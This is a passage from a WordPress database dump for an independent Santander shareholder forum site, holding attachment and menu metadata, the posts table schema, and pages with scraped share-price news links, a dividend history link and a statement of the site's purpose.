pg'),(202,66,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:420;s:4:\"file\";s:31:\"2017/10/13-33-43-26_640x420.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"13-33-43-26_640x420-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"13-33-43-26_640x420-300x197.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:197;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(203,67,'_wp_attached_file','2017/10/18-17-17-737_640x420.jpg'),(204,67,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:420;s:4:\"file\";s:32:\"2017/10/18-17-17-737_640x420.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"18-17-17-737_640x420-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"18-17-17-737_640x420-300x197.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:197;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(205,68,'_wp_attached_file','2017/10/21-32-39-259_640.jpg'),(206,68,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:322;s:4:\"file\";s:28:\"2017/10/21-32-39-259_640.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"21-32-39-259_640-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"21-32-39-259_640-300x151.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:151;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(207,69,'_wp_attached_file','2017/10/22-43-32-144_640.jpg'),(208,69,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:452;s:4:\"file\";s:28:\"2017/10/22-43-32-144_640.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"22-43-32-144_640-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"22-43-32-144_640-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(209,70,'_wp_attached_file','2017/10/23-03-09-602_640.png'),(210,70,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:452;s:4:\"file\";s:28:\"2017/10/23-03-09-602_640.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"23-03-09-602_640-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"23-03-09-602_640-300x212.png\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(211,71,'_wp_attached_file','2017/10/23-08-46-769_640x420.jpg'),(212,71,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:420;s:4:\"file\";s:32:\"2017/10/23-08-46-769_640x420.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"23-08-46-769_640x420-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"23-08-46-769_640x420-300x197.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:197;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(213,72,'_wp_attached_file','2017/10/cropped-13-33-43-26_640x420.jpg'),(214,72,'_wp_attachment_context','custom-header'),(215,72,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1440;s:6:\"height\";i:249;s:4:\"file\";s:39:\"2017/10/cropped-13-33-43-26_640x420.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"cropped-13-33-43-26_640x420-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"cropped-13-33-43-26_640x420-300x52.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:52;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:39:\"cropped-13-33-43-26_640x420-768x133.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:133;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:40:\"cropped-13-33-43-26_640x420-1024x177.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(218,73,'_wp_attached_file','2017/10/cropped-23-08-46-769_640x420.jpg'),(219,73,'_wp_attachment_context','custom-header'),(220,73,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1440;s:6:\"height\";i:249;s:4:\"file\";s:40:\"2017/10/cropped-23-08-46-769_640x420.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"cropped-23-08-46-769_640x420-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"cropped-23-08-46-769_640x420-300x52.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:52;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:40:\"cropped-23-08-46-769_640x420-768x133.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:133;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:41:\"cropped-23-08-46-769_640x420-1024x177.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(221,73,'_wp_attachment_custom_header_last_used_the-authority','1507965714'),(222,73,'_wp_attachment_is_custom_header','the-authority'),(227,17,'_wp_page_template','template-sidebar.php'),(229,81,'_wp_attached_file','2017/10/Dividend-History-to-August-2017.pdf'),(230,10,'_wp_page_template','template-sidebar.php'),(231,13,'_wp_page_template','default'),(232,85,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(233,86,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(234,23,'_wp_page_template','default'),(235,8,'_wp_page_template','default'),(265,107,'_wp_attached_file','2017/10/cropped-23-08-46-769_640x420-1.jpg'),(266,107,'_wp_attachment_context','custom-header'),(267,107,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:53;s:4:\"file\";s:42:\"2017/10/cropped-23-08-46-769_640x420-1.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:41:\"cropped-23-08-46-769_640x420-1-150x53.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:53;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:41:\"cropped-23-08-46-769_640x420-1-300x25.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:25;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(268,107,'_wp_attachment_custom_header_last_used_abubize-business','1507965477'),(269,107,'_wp_attachment_is_custom_header','abubize-business'),(276,112,'_menu_item_type','post_type'),(277,112,'_menu_item_menu_item_parent','0'),(278,112,'_menu_item_object_id','17'),(279,112,'_menu_item_object','page'),(280,112,'_menu_item_target',''),(281,112,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(282,112,'_menu_item_xfn',''),(283,112,'_menu_item_url',''),(285,113,'_menu_item_type','post_type'),(286,113,'_menu_item_menu_item_parent','0'),(287,113,'_menu_item_object_id','25'),(288,113,'_menu_item_object','page'),(289,113,'_menu_item_target',''),(290,113,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(291,113,'_menu_item_xfn',''),(292,113,'_menu_item_url',''),(294,114,'_menu_item_type','post_type'),(295,114,'_menu_item_menu_item_parent','0'),(296,114,'_menu_item_object_id','23'),(297,114,'_menu_item_object','page'),(298,114,'_menu_item_target',''),(299,114,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(300,114,'_menu_item_xfn',''),(301,114,'_menu_item_url',''),(303,115,'_menu_item_type','post_type'),(304,115,'_menu_item_menu_item_parent','0'),(305,115,'_menu_item_object_id','10'),(306,115,'_menu_item_object','page'),(307,115,'_menu_item_target',''),(308,115,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(309,115,'_menu_item_xfn',''),(310,115,'_menu_item_url',''),(312,116,'_menu_item_type','post_type'),(313,116,'_menu_item_menu_item_parent','115'),(314,116,'_menu_item_object_id','13'),(315,116,'_menu_item_object','page'),(316,116,'_menu_item_target',''),(317,116,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(318,116,'_menu_item_xfn',''),(319,116,'_menu_item_url',''),(321,117,'_menu_item_type','post_type'),(322,117,'_menu_item_menu_item_parent','115'),(323,117,'_menu_item_object_id','15'),(324,117,'_menu_item_object','page'),(325,117,'_menu_item_target',''),(326,117,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(327,117,'_menu_item_xfn',''),(328,117,'_menu_item_url',''),(330,118,'_menu_item_type','post_type'),(331,118,'_menu_item_menu_item_parent','0'),(332,118,'_menu_item_object_id','8'),(333,118,'_menu_item_object','page'),(334,118,'_menu_item_target',''),(335,118,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(336,118,'_menu_item_xfn',''),(337,118,'_menu_item_url',''),(366,122,'_menu_item_type','post_type'),(367,122,'_menu_item_menu_item_parent','0'),(368,122,'_menu_item_object_id','23'),(369,122,'_menu_item_object','page'),(370,122,'_menu_item_target',''),(371,122,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(372,122,'_menu_item_xfn',''),(373,122,'_menu_item_url',''),(374,123,'_menu_item_type','post_type'),(375,123,'_menu_item_menu_item_parent','0'),(376,123,'_menu_item_object_id','21'),(377,123,'_menu_item_object','page'),(378,123,'_menu_item_target',''),(379,123,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(380,123,'_menu_item_xfn',''),(381,123,'_menu_item_url',''),(382,124,'_menu_item_type','post_type'),(383,124,'_menu_item_menu_item_parent','0'),(384,124,'_menu_item_object_id','19'),(385,124,'_menu_item_object','page'),(386,124,'_menu_item_target',''),(387,124,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(388,124,'_menu_item_xfn',''),(389,124,'_menu_item_url',''),(390,125,'_edit_last','1'),(391,125,'_wp_page_template','template-sidebar.php'),(392,125,'_edit_lock','1507967686:1'),(393,127,'_menu_item_type','post_type'),(394,127,'_menu_item_menu_item_parent','0'),(395,127,'_menu_item_object_id','125'),(396,127,'_menu_item_object','page'),(397,127,'_menu_item_target',''),(398,127,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(399,127,'_menu_item_xfn',''),(400,127,'_menu_item_url',''),(401,133,'notification_id','532'),(402,133,'type','success'),(403,133,'dismissable','1'),(404,133,'location','[\"everywhere\"]'),(405,133,'plugins','[]'),(406,133,'theme',''),(407,133,'version',''),(408,133,'viewed','0'),(409,134,'notification_id','710'),(410,134,'type','success'),(411,134,'dismissable','1'),(412,134,'location','[\"everywhere\"]'),(413,134,'plugins','[]'),(414,134,'theme',''),(415,134,'version',''),(416,134,'viewed','0'),(417,135,'notification_id','721'),(418,135,'type','success'),(419,135,'dismissable','1'),(420,135,'location','[\"everywhere\"]'),(421,135,'plugins','[]'),(422,135,'theme',''),(423,135,'version',''),(424,135,'viewed','0');
/*!40000 ALTER TABLE `wp_postmeta` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_posts`
--
DROP TABLE IF EXISTS `wp_posts`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_posts` (
`ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`post_author` bigint(20) unsigned NOT NULL DEFAULT 0,
`post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`post_content` longtext NOT NULL,
`post_title` text NOT NULL,
`post_excerpt` text NOT NULL,
`post_status` varchar(20) NOT NULL DEFAULT 'publish',
`comment_status` varchar(20) NOT NULL DEFAULT 'open',
`ping_status` varchar(20) NOT NULL DEFAULT 'open',
`post_password` varchar(255) NOT NULL DEFAULT '',
`post_name` varchar(200) NOT NULL DEFAULT '',
`to_ping` text NOT NULL,
`pinged` text NOT NULL,
`post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`post_content_filtered` longtext NOT NULL,
`post_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
`guid` varchar(255) NOT NULL DEFAULT '',
`menu_order` int(11) NOT NULL DEFAULT 0,
`post_type` varchar(20) NOT NULL DEFAULT 'post',
`post_mime_type` varchar(100) NOT NULL DEFAULT '',
`comment_count` bigint(20) NOT NULL DEFAULT 0,
PRIMARY KEY (`ID`),
KEY `post_name` (`post_name`(191)),
KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
KEY `post_parent` (`post_parent`),
KEY `post_author` (`post_author`)
) ENGINE=InnoDB AUTO_INCREMENT=3137 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_posts`
--
LOCK TABLES `wp_posts` WRITE;
/*!40000 ALTER TABLE `wp_posts` DISABLE KEYS */;
INSERT INTO `wp_posts` VALUES (8,1,'2017-10-02 15:45:21','2017-10-02 15:45:21','<div class=\"g\">\r\n<div class=\"ts _JGs _JHs _tJs _KGs _jHs\">\r\n<div class=\"_hJs\">\r\n<h3 class=\"r _gJs\"><a class=\"l _PMs\" href=\"http://news4j.com/2017/10/14/stock-that-can-flourish-your-investment-banco-santander-s-a-san/\"><em>Stock</em> that can flourish your investment: Banco <em>Santander</em>, SA (SAN)</a></h3>\r\n<div class=\"slp\"><span class=\"_OHs _PHs\">The News Journal</span><span class=\"_QGs\">-</span><span class=\"f nsa _QHs\">1 hour ago</span></div>\r\n<div class=\"st\">Banco <em>Santander</em>, S.A. SAN began its day with a <em>share price</em> of 6.59. .... The outstanding shares for Banco <em>Santander</em>, S.A. is 15771.01 with a ...</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"g\">\r\n<div class=\"ts _JGs _JHs _tJs _KGs _jHs\">\r\n<div class=\"_hJs\">\r\n<h3 class=\"r _gJs\"><a class=\"l _PMs\" href=\"https://postanalyst.com/2017/10/13/analyst-stance-on-two-stocks-bioline-rx-ltd-blrx-banco-santander-s-a-san/\">Analyst Stance On Two Stocks: BioLine Rx Ltd (BLRX), Banco ...</a></h3>\r\n<div class=\"slp\"><span class=\"_OHs _PHs\">Post Analyst</span><span class=\"_QGs\">-</span><span class=\"f nsa _QHs\">11 hours ago</span></div>\r\n<div class=\"st\">The <em>share price</em> has moved forward from its 20 days moving average, ... Turning to Banco <em>Santander</em>, S.A. (NYSE:SAN), its shares were trading ...</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"g\">\r\n<div class=\"ts _JGs _KHs _oGs _LGs _jHs\">\r\n\r\n<a class=\"top _xGs _SHs\" href=\"http://www.autofinancenews.net/santander-aims-to-bolster-fca-relationship-with-executive-shuffle/\"><img class=\"th _RGs\" src=\"https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTbJ2zq6Zx1InMYrMYbgyiqd_hVMUVppCp49SEZcYTGn6OYA439y_RIcbWnXnn_-l7Vz1UUwUg\" alt=\"Story image for santander share price from Auto Finance News\" /></a>\r\n<div class=\"_iHs f\">Auto Finance News</div>\r\n<div class=\"_hJs\">\r\n<h3 class=\"r _gJs\"><a class=\"l _PMs\" href=\"https://www.stocknewsjournal.com/2017/10/13/why-to-keeping-eye-on-ally-financial-inc-ally-santander-consumer-usa-holdings-inc-sc/\">Why to Keeping Eye on Ally Financial Inc. (ALLY), <em>Santander</em> ...</a></h3>\r\n<div class=\"slp\"><span class=\"_OHs _PHs\">StockNewsJournal</span><span class=\"_QGs\">-</span><span class=\"f nsa _QHs\">14 hours ago</span></div>\r\n<div class=\"st\">The <em>stock</em> ended last trade at $23.96 a <em>share</em> and the <em>price</em> is up more than 25.97% so far this year. The company maintains <em>price</em> to book ratio ...</div>\r\n</div>\r\n<div class=\"_sJs card-section\"><a class=\"_pJs\" href=\"https://www.allstocknews.com/2017/10/13/critical-levels-to-breach-santander-consumer-usa-holdings-inc-sc-meritor-inc-mtor/\">Critical Levels To Breach: <em>Santander</em> Consumer USA Holdings Inc ...</a>\r\n<span class=\"nsa _OHs f _PHs\">AllStockNews</span><span class=\"_QGs\">-</span><span class=\"nsa _QHs f\">11 hours ago</span>\r\n<div class=\"_NMs\"><a class=\"_OMs\" href=\"https://news.google.com/news?ncl=d6k4kXGmPtFITTMQLDRz3S_EwP2QM&q=santander+share+price&lr=English&hl=en&sa=X&ved=0ahUKEwiqnJv-we_WAhXEuBoKHZdZBj0QqgIIKzAC\">View all</a></div>\r\n</div>\r\n<div class=\"_cJs\"></div>\r\n</div>\r\n</div>\r\n<div class=\"g\">\r\n<div class=\"ts _JGs _JHs _tJs _KGs _jHs\">\r\n<div class=\"_hJs\">\r\n<h3 class=\"r _gJs\"><a class=\"l _PMs\" href=\"http://www.stocksgallery.com/2017/10/13/banco-santander-s-a-san-has-a-value-of-6-64-per-share-while-bank-of-the-ozarks-ozrk-is-stand-at-45-70/\">Banco <em>Santander</em>, SA (SAN) has a value of $6.64 per <em>share</em> While ...</a></h3>\r\n<div class=\"slp\"><span class=\"_OHs _PHs\">Stocks Gallery</span><span class=\"_QGs\">-</span><span class=\"f nsa _QHs\">16 hours ago</span></div>\r\n<div class=\"st\">In recent trading day Banco <em>Santander</em>, S.A. (SAN) <em>stock</em> showed the move of -0.90% with the closing <em>price</em> of $6.64. Closing <em>price</em> generally ...</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"g\">\r\n<div class=\"ts _JGs _JHs _tJs _KGs _jHs\">\r\n<div class=\"_hJs\">\r\n<h3 class=\"r _gJs\"><a class=\"l _PMs\" href=\"https://stocknewsgazette.com/2017/10/12/banco-santander-s-a-nysesan-gives-mixed-technical-signals-today/\">Banco <em>Santander</em>, SA (NYSE:SAN) Gives Mixed Technical Signals ...</a></h3>\r\n<div class=\"slp\"><span class=\"_OHs _PHs\">StockNewsGazette</span><span class=\"_QGs\">-</span><span class=\"f nsa _QHs\">12 Oct 2017</span></div>\r\n<div class=\"st\">Banco <em>Santander</em>, S.A. (NYSE:SAN) fell by -1.76% in Wednesday\'s trading session from $6.82 to $6.70 The <em>stock price</em> went upward in 6 of the ...</div>\r\n</div>\r\n</div>\r\n</div>','In the News','','publish','closed','open','','financial-informationdividendsscrip-dividends1','','','2017-10-14 06:46:57','2017-10-14 06:46:57','',0,'http://santandershareholder.co.uk/?page_id=8',0,'page','',0),(9,1,'2017-10-02 15:45:21','2017-10-02 15:45:21','','financial-information/dividends/scrip-dividends1','','inherit','closed','closed','','8-revision-v1','','','2017-10-02 15:45:21','2017-10-02 15:45:21','',8,'http://santandershareholder.co.uk/8-revision-v1',0,'revision','',0),(10,1,'2017-10-02 15:46:08','2017-10-02 15:46:08','Santander generally pays dividends four times a year, in February, May, August and November. As will all investments you can receive less return on an investment than you thought. If you have a story on your dividend receipts and why they may not be improving as much as you had thought then please get in touch.\r\n\r\n<a href=\"http://santandershareholder.co.uk/wp-content/uploads/2017/10/Dividend-History-to-August-2017.pdf\">Dividend-History-to-August-2017</a>\r\n<div></div>','Dividends','','publish','closed','open','','financial-information','','','2017-10-14 07:23:13','2017-10-14 07:23:13','',0,'http://santandershareholder.co.uk/?page_id=10',0,'page','',0),(11,1,'2017-10-02 15:46:08','2017-10-02 15:46:08','','financial-information/dividends/scrip-dividends1','','inherit','closed','closed','','10-revision-v1','','','2017-10-02 15:46:08','2017-10-02 15:46:08','',10,'http://santandershareholder.co.uk/10-revision-v1',0,'revision','',0),(12,1,'2017-10-02 15:46:47','2017-10-02 15:46:47','','Financial Information','','inherit','closed','closed','','10-revision-v1','','','2017-10-02 15:46:47','2017-10-02 15:46:47','',10,'http://santandershareholder.co.uk/10-revision-v1',0,'revision','',0),(13,1,'2017-10-02 15:47:12','2017-10-02 15:47:12','<a href=\"http://santandershareholder.co.uk/wp-content/uploads/2017/10/Dividend-History-to-August-2017.pdf\">Dividend-History-to-August-2017</a>','Dividends history','','publish','closed','open','','dividends','','','2017-10-14 06:36:35','2017-10-14 06:36:35','',10,'http://santandershareholder.co.uk/?page_id=13',0,'page','',0),(14,1,'2017-10-02 15:47:12','2017-10-02 15:47:12','','dividends','','inherit','closed','closed','','13-revision-v1','','','2017-10-02 15:47:12','2017-10-02 15:47:12','',13,'http://santandershareholder.co.uk/13-revision-v1',0,'revision','',0),(15,1,'2017-10-02 15:47:45','2017-10-02 15:47:45','','scrip-dividends1','','publish','closed','open','','scrip-dividends1','','','2017-10-02 15:47:45','2017-10-02 15:47:45','',13,'http://santandershareholder.co.uk/?page_id=15',0,'page','',0),(16,1,'2017-10-02 15:47:45','2017-10-02 15:47:45','','scrip-dividends1','','inherit','closed','closed','','15-revision-v1','','','2017-10-02 15:47:45','2017-10-02 15:47:45','',15,'http://santandershareholder.co.uk/15-revision-v1',0,'revision','',0),(17,1,'2017-10-02 15:48:18','2017-10-02 15:48:18','The purpose of this website is to give UK Santander Share holders a forum to voice any satisfaction or dissatification with Santander. The site is NOT associated with Santander or any Santander holding company. If you would like to get in touch with this site\'s webmaster then <a href=\"http://santandershareholder.co.uk/contact-us\">click here.</a>\r\n\r\nWe believe that Santander has not always worked in the best interested of it share holders. We believe that we are not alone in believing this. We would like to hear from other share holders who hold the same options and could elaborate on how best we put pressure on Santander to listen to our objections.\r\n\r\nBelow are some links you might find interesting\r\n<ul>\r\n <li><a href=\"http://www.santander.co.uk/uk/about-santander-uk/investor-relations/events-calendar\" target=\"_blank\" rel=\"noopener\">Here is the calendar for the next results announcements.</a></li>\r\n <li class=\"tituloflex\"><a href=\"https://www.santander.com/csgs/Satellite/CFWCSancomQP01/en_GB/Corporate/Press-room/Santander-News/2017/10/10/Santander-increases-profitability-target-for-2018-.html\" target=\"_self\">Santander increases profitability target for 2018 </a></li>\r\n</ul>\r\nDividends\r\n\r\nIf you feel that the progress and value of Santander share dividend payments have not been the amount that you had hoped for then please <a href=\"http://santandershareholder.co.uk/financial-information\">click here.</a>\r\n\r\n','shareholder-services','','publish','closed','open','','shareholder-services','','','2017-10-14 07:22:08','2017-10-14 07:22:08','',0,'http://santandershareholder.co.uk/?page_id=17',0,'page','',0),(18,1,'2017-10-02 15:48:18','2017-10-02 15:48:18','','shareholder-services','','inherit','closed','closed','','17-revision-v1','','','2017-10-02 15:48:18','2017-10-02 15:48:18','',17,'http://santandershareholder.co.uk/17-revision-v1',0,'revision','',0),(19,1,'2017-10-02 15:48:41','2017-10-02 15:48:41','','legal','','publish','closed','closed','','legal','','','2017-10-02 15:48:41','2017-10-02 15:48:41','',0,'http://santandershareholder.co.uk/?page_id=19',0,'page','',0),(20,1,'2017-10-02 15:48:41','2017-10-02 15:48:41','','legal','','inherit','closed','closed','','19-revision-v1','','','2017-10-02 15:48:41','2017-10-02 15:48:41','',19,'http://santandershareholder.co.uk/19-revision-v1',0,'revision','',0),(21,1,'2017-10-02 15:48:56','2017-10-02 15:48:56','','privacy','','publish','closed','closed','','privacy','','','2017-10-02 15:48:56','2017-10-02 15:48:56','',0,'http://santandershareholder.co.uk/?page_id=21',0,'page','',0),(22,1,'2017-10-02 15:48:56','2017-10-02 15:48:56','','privacy','','inherit','closed','closed','','21-revision-v1','','','2017-10-02 15:48:56','2017-10-02 15:48:56','',21,'http://santandershareholder.co.uk/21-revision-v1',0,'revision','',0),(23,1,'2017-10-02 15:49:13','2017-10-02 15:49:13','[wpforms id=\"86\" title=\"false\" description=\"false\"]','contact','','publish','closed','closed','','contact-us','','','2017-10-14 06:39:27','2017-10-14 06:39:27','',0,'http://santandershareholder.co.uk/?page_id=23',0,'page','',0),(24,1,'2017-10-02 15:49:13','2017-10-02 15:49:13','','contact-us','','inherit','closed','closed','','23-revision-v1','','','2017-10-02 15:49:13','2017-10-02 